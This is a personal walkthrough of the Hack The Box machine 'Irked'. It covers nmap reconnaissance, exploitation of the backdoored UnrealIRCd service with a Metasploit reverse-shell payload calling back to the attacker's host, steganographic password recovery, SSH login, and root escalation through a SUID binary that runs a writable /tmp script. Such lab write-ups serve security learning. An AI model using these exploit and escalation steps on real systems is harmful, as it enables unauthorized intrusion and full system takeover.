Exploiting Ghosts from the Past — Irked | Hack The Box

nmap scan

# Nmap 7.94SVN scan initiated Fri May 23 21:41:53 2025 as: nmap -vvv -sC -A -O -osscan-guess -sV --reason -version-all -oN nmap/03-detail-scan.txt -iL target.txt -p22,80,111,6697,8067,37792,65534
Nmap scan report for 10.10.10.117
Host is up, received reset ttl 62 (0.25s latency).
Scanned at 2025-05-23 21:41:53 IST for 37s

PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 62 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAI+wKAAyWgx/P7Pe78y6/80XVTd6QEv6t5ZIpdzKvS8qbkChLB7LC+/HVuxLshOUtac4oHr/IF9YBytBoaAte87fxF45o3HS9MflMA4511KTeNwc5QuhdHzqXX9ne0ypBAgFKECBUJqJ23Lp2S9KuYEYLzUhSdUEYqiZlcc65NspAAAAFQDwgf5Wh8QRu3zSvOIXTk+5g0eTKQAAAIBQuTzKnX3nNfflt++gnjAJ/dIRXW/KMPTNOSo730gLxMWVeId3geXDkiNCD/zo5XgMIQAWDXS+0t0hlsH1BfrDzeEbGSgYNpXoz42RSHKtx7pYLG/hbUr4836olHrxLkjXCFuYFo9fCDs2/QsAeuhCPgEDjLXItW9ibfFqLxyP2QAAAIAE5MCdrGmT8huPIxPI+bQWeQyKQI/lH32FDZb4xJBPrrqlk9wKWOa1fU2JZM0nrOkdnCPIjLeq9+Db5WyZU2u3rdU8aWLZy8zF9mXZxuW/T3yXAV5whYa4QwqaVaiEzjcgRouex0ev/u+y5vlIf4/SfAsiFQPzYKomDiBtByS9XA==
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDGASnp9kH4PwWZHx/V3aJjxLzjpiqc2FOyppTFp7/JFKcB9otDhh5kWgSrVDVijdsK95KcsEKC/R+HJ9/P0KPdf4hDvjJXB1H3Th5/83gy/TEJTDJG16zXtyR9lPdBYg4n5hhfFWO1PxM9m41XlEuNgiSYOr+uuEeLxzJb6ccq0VMnSvBd88FGnwpEoH1JYZyyTnnbwtBrXSz1tR5ZocJXU4DmI9pzTNkGFT+Q/K6V/sdF73KmMecatgcprIENgmVSaiKh9mb+4vEfWLIe0yZ97c2EdzF5255BalP3xHFAY0jROiBnUDSDlxyWMIcSymZPuE1N6Tu8nQ/pXxKvUar
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFeZigS1PimiXXJSqDy2KTT4UEEphoLAk8/ftEXUq0ihDOFDrpgT0Y4vYgYPXboLlPBKBc0nVBmKD+6pvSwIEy8=
|   256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6m+0iYo68rwVQDYDejkVvsvg22D8MN+bNWMUEOWrhj
80/tcp    open  http    syn-ack ttl 62 Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind syn-ack ttl 62 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37792/tcp   status
|   100024  1          49373/tcp6  status
|   100024  1          53670/udp   status
|_  100024  1          58129/udp6  status
6697/tcp  open  irc     syn-ack ttl 62 UnrealIRCd
8067/tcp  open  irc     syn-ack ttl 62 UnrealIRCd
37792/tcp open  status  syn-ack ttl 62 1 (RPC #100024)
65534/tcp open  irc     syn-ack ttl 62 UnrealIRCd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.13 or 4.2 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%), Linux 4.4 (95%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=5/23%OT=22%CT=%CU=33113%PV=Y%DS=3%DC=T%G=N%TM=68309E6E%P=x86_64-pc-linux-gnu)
SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)
OPS(O1=M552ST11NW7%O2=M552ST11NW7%O3=M552NNT11NW7%O4=M552ST11NW7%O5=M552ST11NW7%O6=M552ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%T=40%W=7210%O=M552NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.023 days (since Fri May 23 21:09:13 2025)
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   1.85 ms   192.168.0.59
2   247.07 ms 10.10.14.1
3   249.76 ms 10.10.10.117

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 23 21:42:30 2025 -- 1 IP address (1 host up) scanned in 37.04 seconds

65534/tcp open  irc     syn-ack ttl 62 UnrealIRCd (Admin email [email protected])

[email protected] found in nmap scan
was not sure about UnrealIRCd so googled it
- https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/
nmap had a way to verify
- https://nmap.org/nsedoc/scripts/irc-unrealircd-backdoor.html

nmap -d -p 6697,6667,8067,65534 10.10.10.117 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor

got to know it was vulnerable

PORT      STATE  SERVICE    REASON
6667/tcp  closed irc        conn-refused
6697/tcp  open   ircs-u     syn-ack
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
8067/tcp  open   infi-async syn-ack
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
65534/tcp open   unknown    syn-ack
Final times for host: srtt: 258737 rttvar: 89971  to: 618621

use msf

msfconsole

use unix/irc/unreal_ircd_3281_backdoor

set PAYLOAD cmd/unix/reverse
set RHOSTS   10.10.10.117
set RPORT    6697
set LHOST 10.10.14.8
set LPORT 4444
run

while exploring went to the Documents
it has a .backup file
- when i cat it

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

this secition i did look at the walk rhough cause it did not hit me. this si where the box went from real world to more CTF type
download the picture from the website port 80

steghide extract -p UPupDOWNdownLRlrBAbaSSss -sf irked.jpg

you get

Kab6h+m+bbp2J:HG

ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no [email protected]

ssh with this password
after looking around for sometime i looked into the suid binaries

find / -type f -perm -4000 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

from which
- /usr/bin/viewuser stood out
when i tried to run it i got the following output

/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           May 23 11:34 (:0)
djmardov pts/0        May 23 13:23 (10.10.14.8)
sh: 1: /tmp/listusers: not found

the last line caught my attention
sh: 1: /tmp/listusers: not found
echo "ls">/tmp/listusers

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           May 23 11:34 (:0)
djmardov pts/0        May 23 13:23 (10.10.14.8)
root@irked:~# ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  user.txt

now tried for a shell

echo '/bin/bash' > /tmp/listusers

djmardov@irked:~$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           May 23 11:34 (:0)
djmardov pts/0        May 23 13:23 (10.10.14.8)
root@irked:~# ls

References

NFS Isn’t Just File Sharing — It’s RPC in Disguise

PreviousExploiting the HTB “Networked” Box: From Recon to Root NextReal-World Security Lessons from HTB’s Postman: Misconfig to Root📮

Last updated 6 months ago